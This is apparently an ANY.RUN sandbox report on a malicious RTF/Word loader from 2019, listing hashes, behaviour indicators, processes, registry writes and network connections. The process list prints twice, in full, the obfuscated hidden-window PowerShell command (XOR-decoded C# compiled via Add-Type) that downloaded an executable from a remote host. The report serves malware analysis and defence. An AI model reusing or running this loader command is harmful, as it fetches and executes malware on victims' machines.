analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

583524278.doc

Full analysis: https://app.any.run/tasks/54ae0bb1-c906-4846-8c73-751944957b43
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: July 18, 2019, 04:36:34
OS: Windows 10 Professional (build: 16299, 64 bit)
Tags:
ole-embedded
generated-doc
loader
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, unknown character set
MD5:

D71ECE9B762E3CDFF2ACD8CC058EA40C

SHA1:

631A487320531DE0E0BB59D91DCCC7305FB5C782

SHA256:

5967CECCA69A0DCC326F4606F40AED778E489CA086EDBB7A3514C4291AC8AA5B

SSDEEP:

3072:oHMAYDodWAYDodWAYDodWAYDodWAYDodHtxS:1AQdAQdAQdAQdAQaS

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Scans artifacts that could help determine the target

      • WINWORD.EXE (PID: 5260)
      • EXCEL.EXE (PID: 2128)
      • EXCEL.EXE (PID: 2816)
      • EXCEL.EXE (PID: 1292)
      • EXCEL.EXE (PID: 1712)
      • EXCEL.EXE (PID: 5720)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 252)
    • Application was dropped or rewritten from another process

      • l9137e5.exe (PID: 4396)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 5260)
  • SUSPICIOUS

    • Reads Environment values

      • WINWORD.EXE (PID: 5260)
      • EXCEL.EXE (PID: 2128)
      • powershell.exe (PID: 252)
      • EXCEL.EXE (PID: 2816)
      • EXCEL.EXE (PID: 1292)
      • EXCEL.EXE (PID: 1712)
      • EXCEL.EXE (PID: 5720)
    • Executed via COM

      • EXCEL.EXE (PID: 2128)
      • EXCEL.EXE (PID: 2816)
      • EXCEL.EXE (PID: 1292)
      • EXCEL.EXE (PID: 1712)
      • EXCEL.EXE (PID: 5720)
      • excelcnv.exe (PID: 3372)
      • OpenWith.exe (PID: 2424)
    • Executed via WMI

      • powershell.exe (PID: 252)
      • powershell.exe (PID: 716)
      • powershell.exe (PID: 4172)
      • powershell.exe (PID: 644)
      • powershell.exe (PID: 5692)
    • PowerShell script executed

      • powershell.exe (PID: 252)
      • powershell.exe (PID: 716)
      • powershell.exe (PID: 4172)
      • powershell.exe (PID: 644)
      • powershell.exe (PID: 5692)
    • Reads the machine GUID from the registry

      • powershell.exe (PID: 252)
      • cvtres.exe (PID: 5252)
      • powershell.exe (PID: 716)
      • csc.exe (PID: 5772)
      • cvtres.exe (PID: 6096)
      • powershell.exe (PID: 4172)
      • cvtres.exe (PID: 2632)
      • csc.exe (PID: 1640)
      • cvtres.exe (PID: 1972)
      • powershell.exe (PID: 644)
      • l9137e5.exe (PID: 4396)
      • csc.exe (PID: 2636)
      • powershell.exe (PID: 5692)
      • cvtres.exe (PID: 3768)
      • csc.exe (PID: 5800)
      • csc.exe (PID: 2076)
    • Creates files in the user directory

      • powershell.exe (PID: 252)
      • cmd.exe (PID: 3160)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 252)
      • csc.exe (PID: 2636)
    • Starts CMD.EXE for commands execution

      • l9137e5.exe (PID: 4396)
    • Reads Microsoft Outlook installation path

      • WINWORD.EXE (PID: 5260)
    • Starts Internet Explorer

      • OpenWith.exe (PID: 2424)
    • Checks supported languages

      • OpenWith.exe (PID: 2424)
  • INFO

    • Reads settings of System Certificates

      • WINWORD.EXE (PID: 5260)
      • EXCEL.EXE (PID: 2128)
      • powershell.exe (PID: 252)
      • EXCEL.EXE (PID: 2816)
      • powershell.exe (PID: 716)
      • EXCEL.EXE (PID: 1292)
      • powershell.exe (PID: 4172)
      • powershell.exe (PID: 644)
      • EXCEL.EXE (PID: 1712)
      • powershell.exe (PID: 5692)
      • EXCEL.EXE (PID: 5720)
      • IEXPLORE.EXE (PID: 4524)
      • IEXPLORE.EXE (PID: 2524)
    • Reads the software policy settings

      • WINWORD.EXE (PID: 5260)
      • EXCEL.EXE (PID: 2128)
      • powershell.exe (PID: 252)
      • powershell.exe (PID: 716)
      • EXCEL.EXE (PID: 2816)
      • powershell.exe (PID: 4172)
      • EXCEL.EXE (PID: 1292)
      • EXCEL.EXE (PID: 1712)
      • powershell.exe (PID: 644)
      • EXCEL.EXE (PID: 5720)
      • powershell.exe (PID: 5692)
      • IEXPLORE.EXE (PID: 4524)
      • IEXPLORE.EXE (PID: 2524)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 5260)
    • Reads the machine GUID from the registry

      • WINWORD.EXE (PID: 5260)
      • EXCEL.EXE (PID: 2128)
      • EXCEL.EXE (PID: 2816)
      • EXCEL.EXE (PID: 1292)
      • EXCEL.EXE (PID: 1712)
      • EXCEL.EXE (PID: 5720)
      • IEXPLORE.EXE (PID: 888)
      • IEXPLORE.EXE (PID: 4524)
      • IEXPLORE.EXE (PID: 2524)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 5260)
      • EXCEL.EXE (PID: 2128)
      • EXCEL.EXE (PID: 2816)
      • EXCEL.EXE (PID: 1292)
      • EXCEL.EXE (PID: 1712)
      • EXCEL.EXE (PID: 5720)
      • excelcnv.exe (PID: 3372)
    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 252)
      • IEXPLORE.EXE (PID: 2524)
    • Changes internet zones settings

      • IEXPLORE.EXE (PID: 2524)
    • Reads internet explorer settings

      • IEXPLORE.EXE (PID: 888)
      • IEXPLORE.EXE (PID: 4524)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

InternalVersionNumber: 57435
CharactersWithSpaces: 4
Characters: 4
Words: -
Pages: 1
TotalEditTime: -
RevisionNumber: 1
ModifyDate: 2019:01:07 23:54:00
CreateDate: 2019:01:07 23:54:00
LastModifiedBy: Admin
Author: Admin
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
133
Monitored processes
38
Malicious processes
2
Suspicious processes
11

Behavior graph

Click at the process to see the details
start drop and start winword.exe excel.exe powershell.exe conhost.exe excel.exe csc.exe no specs cvtres.exe no specs powershell.exe no specs conhost.exe excel.exe csc.exe no specs l9137e5.exe no specs cvtres.exe no specs powershell.exe no specs conhost.exe excel.exe csc.exe cvtres.exe no specs powershell.exe no specs conhost.exe excel.exe csc.exe no specs cvtres.exe no specs cmd.exe no specs conhost.exe cmd.exe no specs conhost.exe powershell.exe no specs conhost.exe excelcnv.exe no specs csc.exe no specs cvtres.exe no specs splwow64.exe no specs openwith.exe no specs iexplore.exe iexplore.exe no specs iexplore.exe no specs iexplore.exe

Process information

PID
CMD
Path
Indicators
Parent process
5260"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\admin\Desktop\583524278.doc" /o ""C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
16.0.11328.20158
2128"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
16.0.11328.20158
252powershell -WindowStyle Hidden function l44296 { param($p527e) $lbce3b = 'o18b65a';$c5237a8 = ''; for ($i = 0; $i -lt $p527e.length; $i+=2) { $d3e87 = [convert]::ToByte($p527e.Substring($i, 2), 16); $c5237a8 += [char]($d3e87 -bxor $lbce3b[($i / 2) % $lbce3b.length]); } return $c5237a8; } $r85637d = '1a42510c51153216424c075b0e141c5856051666181c455d0f1867140145510f531b2801455d105945320a434e0b55501254444b0b5852413c484b1653584f2b585905585a121b585b110d4012065f5f42654c121b54554c7f7a5a1a42510c51153216424c075b1b2f0a45036f3c45140d5d510116560d0e424b424c57570c070c004d6e25035d710f465a131b191a0953470f0a5d0b5014192401454a1b665a08014505407150153f4357017751051d544b11141c3c4f414d005a5c024f424c03425c024f54401653470f4f7856166641134f480e540e00550e19710c4265151d114b50020d5458051411424708015618090e56555a18033972590d265c480d4441494d5a5d1058500d5c031a4e16700f1b434132595c0f1b11054214790e0e55740b5447001d481a4b6b15111a53540b5515121b504c0b55150417455d10581528014568164415065a040006520c491c454a0b5852411b545d03070352460a63265a592802415710421d4304544a0c5359525d131442735b151d48680d5f5b1552136e0b4441140e5d68105941040c451a4b6b15111a53540b5515121b504c0b55150417455d10581503005e5442570d5457035e4a7f5b153f454a424351560c5514377f5b153f454a425a500209035c551a1514065f4c425d045258505d571a150e1a4518175f5b154f595e00530248546a7c0e5a7c0c1f5e4a161e172a0a4356075a06534155540e1419412a5f4c104f650e065f4c5f146715037c5714537804025e4a1b1419413c544c2e5746152a434a0d4408070e5d4b071f68411c4559165f56410a494c07445b41195e51061644025a520f4a7f5b153f454a425b01050a535a4e7f5b153f454a425d57525b55094e5f5b154f4b0e000402525e18031243570d065218114254150652180b5841411e020e065753034718432b5841311b4318100102550a52185f1652545a095c060f1d0d5b050a5b001d435f540d010257510d0000570705055f021a4b1f0e0809194a550101040c0c052b5841311b43163853470e464a5f0d425a410a085e00040c5a127856166641134f5f0b0407025c16070e5a03010047430f55025002435d0c56040c5747130a070356550d015a540300575f0108530106550b010c570600515e021a4b1f0e0809195651500456520c710c4265151d1f6207445a481456571659150456575a500f0e1c3a7856166641134f4b0c5752545652196d2b5841311b4311570d400801451807570c525e0405520d5c074710595a030d5309195651500456434b0c575254564301405606190e1a451807570c525e04114b4d520e1b5e18070f53035d08031f744c150a6a65424f53055b005d5f4d05195c0014524e53074301405b06485a265f4c324247411f525b5457082c0e434b0a57594f2e5d540d557d26035e5a035a1d52460a75034446090e5d162159451847485e06020404430114125556570e1d0b4b0d44025a520f4a5850164f785616664113475f0b0407024f3b5e710c420355471813524e05515e53114e465602595014511f0e0456575a500f0f4138545a215a5c04014518050400555652050c53424138545a215a5c040145104b0d46151d5856051657035b020f0005082401475110595b0c0a5f4c4c715015295e54065347310e45504a735b170643570c5b500f1b1f6b125356080e5d7e0d5a51041d1f79124659080c504c0b595b250e45594b1d173d335d01530502045a13130e020153560710400204545b05085201174854560a57020c024175571558590e0e557e0b5a504903050c500f03494d010f560301025e030c570653550a0508570500505f520d550204515b005c560e00575f020d550356510e0509570400565f57095b06055456045b520205005a070856060754570509570201515f061a4b1a57035b020f00051c5a3f4357015346123c455910427c0f095e1812070d070b55050c5342413f4357015346123c455910427c0f095e100054015258530b4b0d651300525d11451b321b504a161e455057575c061f0e130a454d10581551544c48175459080c114b165741080c114b16445c0f0811545602075859194b16445c0f0811555b550256464a4b16445c0f08114b50020d54580505405904590d070d03140e121b43510c5115065a040006520c5c3c454a0b58524f2a5c48164f0e070043100b584141060c08595f090c56520f5518790401564c0a0d5c4a52031119544c150a114154000d545b500521595b170a434c4c625a2316455d4a5b0c02580616314357121b43510c511d084303114e07034854560d570e5105561a054a555d001d18101b0003595a0559426815125d05005701013a475817501f15444f420a560e00565b1f7407585215076c11594b47041b444a0c1652545a095c060f0e1c12'; $r85637d2 = l44296($r85637d); Add-Type -TypeDefinition $r85637d2; [zb6c64b]::q36dafb(); C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
wmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
2388\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
2816"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
16.0.11328.20158
5772"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\dvg2liwx.cmdline"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Visual C# Command Line Compiler
Exit code:
0
Version:
4.7.2556.0 built by: NET471REL1
5252C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES6DC8.tmp" "c:\Users\admin\AppData\Local\Temp\CSCBA8AD52C1C3B4B7DB3827D7A78FC789.TMP"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.execsc.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft® Resource File To COFF Object Conversion Utility
Exit code:
0
Version:
12.00.52519.0 built by: VSWINSERVICING
716powershell -WindowStyle Hidden function l44296 { param($p527e) $lbce3b = 'o18b65a';$c5237a8 = ''; for ($i = 0; $i -lt $p527e.length; $i+=2) { $d3e87 = [convert]::ToByte($p527e.Substring($i, 2), 16); $c5237a8 += [char]($d3e87 -bxor $lbce3b[($i / 2) % $lbce3b.length]); } return $c5237a8; } $r85637d = '1a42510c51153216424c075b0e141c5856051666181c455d0f1867140145510f531b2801455d105945320a434e0b55501254444b0b5852413c484b1653584f2b585905585a121b585b110d4012065f5f42654c121b54554c7f7a5a1a42510c51153216424c075b1b2f0a45036f3c45140d5d510116560d0e424b424c57570c070c004d6e25035d710f465a131b191a0953470f0a5d0b5014192401454a1b665a08014505407150153f4357017751051d544b11141c3c4f414d005a5c024f424c03425c024f54401653470f4f7856166641134f480e540e00550e19710c4265151d114b50020d5458051411424708015618090e56555a18033972590d265c480d4441494d5a5d1058500d5c031a4e16700f1b434132595c0f1b11054214790e0e55740b5447001d481a4b6b15111a53540b5515121b504c0b55150417455d10581528014568164415065a040006520c491c454a0b5852411b545d03070352460a63265a592802415710421d4304544a0c5359525d131442735b151d48680d5f5b1552136e0b4441140e5d68105941040c451a4b6b15111a53540b5515121b504c0b55150417455d10581503005e5442570d5457035e4a7f5b153f454a424351560c5514377f5b153f454a425a500209035c551a1514065f4c425d045258505d571a150e1a4518175f5b154f595e00530248546a7c0e5a7c0c1f5e4a161e172a0a4356075a06534155540e1419412a5f4c104f650e065f4c5f146715037c5714537804025e4a1b1419413c544c2e5746152a434a0d4408070e5d4b071f68411c4559165f56410a494c07445b41195e51061644025a520f4a7f5b153f454a425b01050a535a4e7f5b153f454a425d57525b55094e5f5b154f4b0e000402525e18031243570d065218114254150652180b5841411e020e065753034718432b5841311b4318100102550a52185f1652545a095c060f1d0d5b050a5b001d435f540d010257510d0000570705055f021a4b1f0e0809194a550101040c0c052b5841311b43163853470e464a5f0d425a410a085e00040c5a127856166641134f5f0b0407025c16070e5a03010047430f55025002435d0c56040c5747130a070356550d015a540300575f0108530106550b010c570600515e021a4b1f0e0809195651500456520c710c4265151d1f6207445a481456571659150456575a500f0e1c3a7856166641134f4b0c5752545652196d2b5841311b4311570d400801451807570c525e0405520d5c074710595a030d5309195651500456434b0c575254564301405606190e1a451807570c525e04114b4d520e1b5e18070f53035d08031f744c150a6a65424f53055b005d5f4d05195c0014524e53074301405b06485a265f4c324247411f525b5457082c0e434b0a57594f2e5d540d557d26035e5a035a1d52460a75034446090e5d162159451847485e06020404430114125556570e1d0b4b0d44025a520f4a5850164f785616664113475f0b0407024f3b5e710c420355471813524e05515e53114e465602595014511f0e0456575a500f0f4138545a215a5c04014518050400555652050c53424138545a215a5c040145104b0d46151d5856051657035b020f0005082401475110595b0c0a5f4c4c715015295e54065347310e45504a735b170643570c5b500f1b1f6b125356080e5d7e0d5a51041d1f79124659080c504c0b595b250e45594b1d173d335d01530502045a13130e020153560710400204545b05085201174854560a57020c024175571558590e0e557e0b5a504903050c500f03494d010f560301025e030c570653550a0508570500505f520d550204515b005c560e00575f020d550356510e0509570400565f57095b06055456045b520205005a070856060754570509570201515f061a4b1a57035b020f00051c5a3f4357015346123c455910427c0f095e1812070d070b55050c5342413f4357015346123c455910427c0f095e100054015258530b4b0d651300525d11451b321b504a161e455057575c061f0e130a454d10581551544c48175459080c114b165741080c114b16445c0f0811545602075859194b16445c0f0811555b550256464a4b16445c0f08114b50020d54580505405904590d070d03140e121b43510c5115065a040006520c5c3c454a0b58524f2a5c48164f0e070043100b584141060c08595f090c56520f5518790401564c0a0d5c4a52031119544c150a114154000d545b500521595b170a434c4c625a2316455d4a5b0c02580616314357121b43510c511d084303114e07034854560d570e5105561a054a555d001d18101b0003595a0559426815125d05005701013a475817501f15444f420a560e00565b1f7407585215076c11594b47041b444a0c1652545a095c060f0e1c12'; $r85637d2 = l44296($r85637d); Add-Type -TypeDefinition $r85637d2; [zb6c64b]::q36dafb(); C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
10.0.16299.15 (WinBuild.160101.0800)
1856\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\WINDOWS\system32\conhost.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.16299.15 (WinBuild.160101.0800)
1292"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" -EmbeddingC:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Excel
Exit code:
0
Version:
16.0.11328.20158
Total events
14 518
Read events
13 587
Write events
783
Delete events
148

Modification events

(PID) Process:(5260) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\Common\ClientTelemetry\Sampling
Operation:writeName:0
Value:
017012000000001000BE4E402C04000000000000000400000000000000
(PID) Process:(5260) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
2
(PID) Process:(5260) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-US
Value:
1
(PID) Process:(5260) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
Operation:writeName:en-GB
Value:
1
(PID) Process:(5260) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
Operation:writeName:x+,
Value:
782B2C008C14000001000000000000004DD0AC6E223DD50100000000
(PID) Process:(5260) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\StartupItems
Operation:writeName:(+,
Value:
282B2C008C14000000000440010000002F30AF6E223DD501D206000008AA1DEE2CDEAC4C9616FC8F36DA54CB2F30AF6E223DD5010000000000001000BE4E402C0000000006000000010000000200000000000000000000000000556E6B6E6F776E00000000000000000000000000000000000000000000000000000000000000000000000000000000000DF0ADDE0DF0ADDE0DF0ADDE0DF0ADDE440045004600410055004C00540000000000B40AD701000002000000FF7F000000000000000000000000000000000000C8AB2FDC91000000200000000000000030000000000000002BABBD3AFF7F000000000000000000003000000000000000C012D10AD701000000000000000000000000D10AD70100002001D50CD70100001000000000000000200000000000000040000000000000002BABBD3AFF7F00004000000000000000C00CD10AD70100000E0000000000000040000000000000008000D50CD70100000000000000000000C015D10AD701000000000000FF7F00000000D10AD7010000184FC70CD7010000400000000000000030000000000000000000B40AD7010000D289025BFF7F00004000000000000000C00CD10AD70100000A00000000000000700000000000000080AA2FDC91000000000000000000000000000000000000002C0000000000000000000000000000000700000000000000700000000000000060000000000000000000B40AD7010000D289025BFF7F00004000000000000000000000009100000060000000000000000000000091000000C015D10AD701000000000000000000000000D10AD7010000184FC70CD701000030000000000000002BABBD3AFF7F000030000000000000007668025BFF7F000090AA2FDC91000000C00CD10AD70100002B0000000000000070000000000000003000000000000000440045004600410055004C0054000000A20000000000000000000000000000000700000000000000700000000000000060000000000000000000B40AD7010000D289025BFF7F0000400000000000000000000000D7010000600000000000000000000000000000000000B40AD70100009CBB025BFF7F0000F006000000000000020000000000000000000000000000009D29AE3AFF7F00004000000000000000C00CD10AD701000000000000D70100000000000000000000000000000000000001000000000000000000000000000000C05CBD0CD70100001000000000000000070000001B0000000000000000000000B05CBD0CD7010000B05CBD0CD7010000FF030000FF7F000080000000000000003800000000000000180000000000000018000000000000001800000000000000CFA2BD3AFF7F00006000000000000000000000000000000000000000000000000000000000000000BF80FFFF6D00000000000000A6FEFFFF300000000000000098B6B40AD70100005001B40AD7010000870000000000000089AC2FDC9100000000000000000000000003B40AD7010000180000000000000010B6C70CD7010000FEFFFFFFFFFFFFFFD04EC70CD701000010AEBA0AD70100002C00000000000000A0BCC70CD70100002C00000000000000F0060000000000003882C43AFF7F00007668025BFF7F000018000000000000000900000000000000440045004600410055004C005400000089AC2FDC9100000002000002FF7F0000040000000000000050AC2FDC910000008000D50CD7010000E10100E0FF7F00000400000000000000B07F00CFFF7F000088AC2FDC9100000002000002910000003882C43AFF7F000060AD2FDC9100000000000000000000007668025BFF7F00000026D70CD70100001B00001B91000000C0E1BD0AD7010000149EBD3AFF7F0000C8AD2FDC9100000060AC2FDC9100000068E4C43AFF7F000040E4C43AFF7F000000000000000000000000000000000000A20000000000000000000000000000006F00000000000000F0060000000000000000B40AD7010000AB8E025BFF7F00000000B40AD70100000200000000000000E006000000000000F0060000000000008806B40AD701000088AC2FDC910000005029D70CD701000003000000FF7F0000FEFFFFFFFFFFFFFF000000000000000058AD2FDC9100000046F4AB3AFF7F0000702AD70CD7010000E658C135FF7F000000000000000000005007C70CD7010000C012D10AD7010000E658C135FF7F00000126180000000000F0EE6F31FF7F0000A20000000000000000000000000000000800000000000000C3484335FF7F0000305DBD0CD7010000E00600000000000030B12FDC910000000000000000000000C05CBD0CD7010000CB4B4335FF7F0000D05CBD0CD701000030B12FDC910000006E2EFAF9B23DD501000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000069006300
(PID) Process:(5260) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(5260) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(5260) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(5260) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
Executable files
2
Suspicious files
21
Text files
58
Unknown types
17

Dropped files

PID
Process
Filename
Type
2128EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm
MD5:
SHA256:
2128EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
MD5:
SHA256:
5772csc.exeC:\Users\admin\AppData\Local\Temp\dvg2liwx.dll
MD5:
SHA256:
5772csc.exeC:\Users\admin\AppData\Local\Temp\dvg2liwx.out
MD5:
SHA256:
2816EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-shm
MD5:
SHA256:
2816EXCEL.EXEC:\Users\admin\AppData\Local\Microsoft\Office\OTele\excel.exe.db-wal
MD5:
SHA256:
252powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_pxu3g2ea.sop.psm1text
MD5:0534487230078B72C814AF5A11B1EFB2
SHA256:2660653218476CA55D7268F9748C79319E6648CC86B64BD12011A25426EE50C6
5260WINWORD.EXEC:\Users\admin\Desktop\~$3524278.docpgc
MD5:C5D10E073C831FD01E2CABC5D1CC8B4C
SHA256:F65DA600216B4B33DAC476A9370B6BEFC7FB735EB32A4C3619216501CF2A1343
252powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_41sieqag.frw.ps1text
MD5:0534487230078B72C814AF5A11B1EFB2
SHA256:2660653218476CA55D7268F9748C79319E6648CC86B64BD12011A25426EE50C6
5260WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:3B91E6AFCAECC942CA436D263BF64D1A
SHA256:3BED7D22623C5F6638DC19618831B499A5FDB36CCEB7CA2C68DEB65237E84E41
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
47
TCP/UDP connections
46
DNS requests
17
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4524
IEXPLORE.EXE
GET
302
2.19.38.59:443
https://go.microsoft.com/fwlink/?LinkId=517287
unknown
whitelisted
4524
IEXPLORE.EXE
GET
302
2.19.38.59:443
https://go.microsoft.com/fwlink/?LinkId=838604
unknown
whitelisted
2128
EXCEL.EXE
POST
200
52.114.75.78:443
https://self.events.data.microsoft.com/OneCollector/1.0/
NL
text
54 b
whitelisted
5260
WINWORD.EXE
POST
200
52.114.75.78:443
https://self.events.data.microsoft.com/OneCollector/1.0/
NL
text
81 b
whitelisted
1292
EXCEL.EXE
POST
200
52.114.75.78:443
https://self.events.data.microsoft.com/OneCollector/1.0/
NL
text
56 b
whitelisted
1292
EXCEL.EXE
POST
200
52.114.75.78:443
https://self.events.data.microsoft.com/OneCollector/1.0/
NL
text
52 b
whitelisted
2128
EXCEL.EXE
POST
200
52.114.75.78:443
https://self.events.data.microsoft.com/OneCollector/1.0/
NL
text
52 b
whitelisted
2816
EXCEL.EXE
POST
200
52.114.75.78:443
https://self.events.data.microsoft.com/OneCollector/1.0/
NL
text
9 b
whitelisted
4524
IEXPLORE.EXE
GET
200
2.21.38.54:443
https://www.microsoft.com/en-gb/welcomeie11/
FR
html
45.3 Kb
whitelisted
2128
EXCEL.EXE
GET
200
13.107.3.128:443
https://config.edge.skype.com/config/v1/Office/16.0.11328.20158?&Clientid=%7bD61AB268-C26A-439D-BB15-2A0DEDFCA6A3%7d&Application=excel&Platform=win32&Version=16.0.11328.20158&MsoVersion=16.0.11328.20156&Audience=Production&Build=ship&Architecture=x64&Language=en-US&SubscriptionLicense=false&PerpetualLicense=2019&Channel=CC&InstallType=C2R&SessionId=%7b35D77AF2-E12E-4AD8-A5D0-1A468F88DD9B%7d&LabMachine=false
US
text
60.3 Kb
whitelisted
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
5260
WINWORD.EXE
13.107.3.128:443
config.edge.skype.com
Microsoft Corporation
US
whitelisted
2128
EXCEL.EXE
13.107.3.128:443
config.edge.skype.com
Microsoft Corporation
US
whitelisted
4524
IEXPLORE.EXE
2.19.38.59:443
go.microsoft.com
Akamai International B.V.
whitelisted
5720
EXCEL.EXE
52.114.128.43:443
self.events.data.microsoft.com
Microsoft Corporation
US
unknown
1712
EXCEL.EXE
52.114.128.43:443
self.events.data.microsoft.com
Microsoft Corporation
US
unknown
252
powershell.exe
107.172.13.106:443
binaterynaaik.com
ColoCrossing
US
unknown
5260
WINWORD.EXE
52.114.75.78:443
self.events.data.microsoft.com
Microsoft Corporation
NL
unknown
1292
EXCEL.EXE
52.114.75.78:443
self.events.data.microsoft.com
Microsoft Corporation
NL
unknown
2128
EXCEL.EXE
52.114.75.78:443
self.events.data.microsoft.com
Microsoft Corporation
NL
unknown
2816
EXCEL.EXE
52.114.75.78:443
self.events.data.microsoft.com
Microsoft Corporation
NL
unknown

DNS requests

Domain
IP
Reputation
config.edge.skype.com
  • 13.107.3.128
whitelisted
self.events.data.microsoft.com
  • 52.114.75.78
  • 52.114.128.43
whitelisted
binaterynaaik.com
  • 107.172.13.106
unknown
go.microsoft.com
  • 2.19.38.59
whitelisted
www.microsoft.com
  • 2.21.38.54
whitelisted
ajax.aspnetcdn.com
  • 152.199.19.160
whitelisted
statics-uhf-wus.akamaized.net
  • 2.16.186.32
  • 2.16.186.11
whitelisted
c.s-microsoft.com
  • 2.18.233.62
whitelisted
mem.gfx.ms
  • 104.109.56.54
whitelisted
img-prod-cms-rt-microsoft-com.akamaized.net
  • 2.16.186.27
  • 2.16.186.40
whitelisted

Threats

No threats detected
Process
Message
EXCEL.EXE
2019-07-18 04:37:09.479 T#3600 <E> [AriaSDK.PAL] PAL is already shutdown!
EXCEL.EXE
2019-07-18 04:37:20.589 T#6088 <E> [AriaSDK.PAL] PAL is already shutdown!
EXCEL.EXE
